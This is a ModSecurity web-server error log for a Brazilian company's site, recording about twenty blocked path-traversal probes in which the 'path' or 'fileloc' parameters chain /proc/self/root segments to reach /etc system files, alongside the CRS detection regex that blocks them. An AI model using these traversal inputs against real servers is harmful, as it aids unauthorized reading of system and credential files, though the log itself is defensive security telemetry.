[Wed Mar 18 12:04:31.493890 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:48862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-__u8EFLIOrSqIpsQ8QAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:04:32.862147 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.243.128:48874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_AOw_le52K8_3pV3soAAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:06:42.290114 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:52852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_ggkwaGbbGflqUZAdNAAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:06:44.737411 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.241.31:60756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_hCmAPhZkrhU8w4l7IgAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:07:31.696808 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:39700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_s9a6ubjKNq_cu4aqEwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:07:33.582938 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:60758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_teoXxyEfFpUF8f97SAAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:07:34.920052 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:46752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_ttY0UrI5A3LftIy-CAAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:07:38.209346 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:34890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_uvu8EFLIOrSqIpsRuAAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:07:40.558704 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:54536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_vCmAPhZkrhU8w4l7QQAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:07:41.888617 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:54542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_vew_le52K8_3pV3s9wAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:07:43.271442 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:54554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_v-yqAr6etmhZHNrRjAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:07:50.103236 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:54570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_xuw_le52K8_3pV3tBwAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:07:52.463493 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:37636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_yMdf6f5d65gmYZTilwAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:07:54.305045 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:37652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_ydY0UrI5A3LftIy-HgAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:07:57.867605 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:37668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_zQkwaGbbGflqUZAddAAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:07:59.383361 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:37678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_z-oXxyEfFpUF8f97UgAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:04.012643 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:36676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_1EzinOy1jxa1j4ckIAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:07.731363 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:36680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_18df6f5d65gmYZTirAAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:09.006746 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.243.128:36688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_2UzinOy1jxa1j4ckIQAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:12.648429 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:36936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_3Mdf6f5d65gmYZTisAAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:08:13.988013 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:36944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq_3dY0UrI5A3LftIy-KgAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
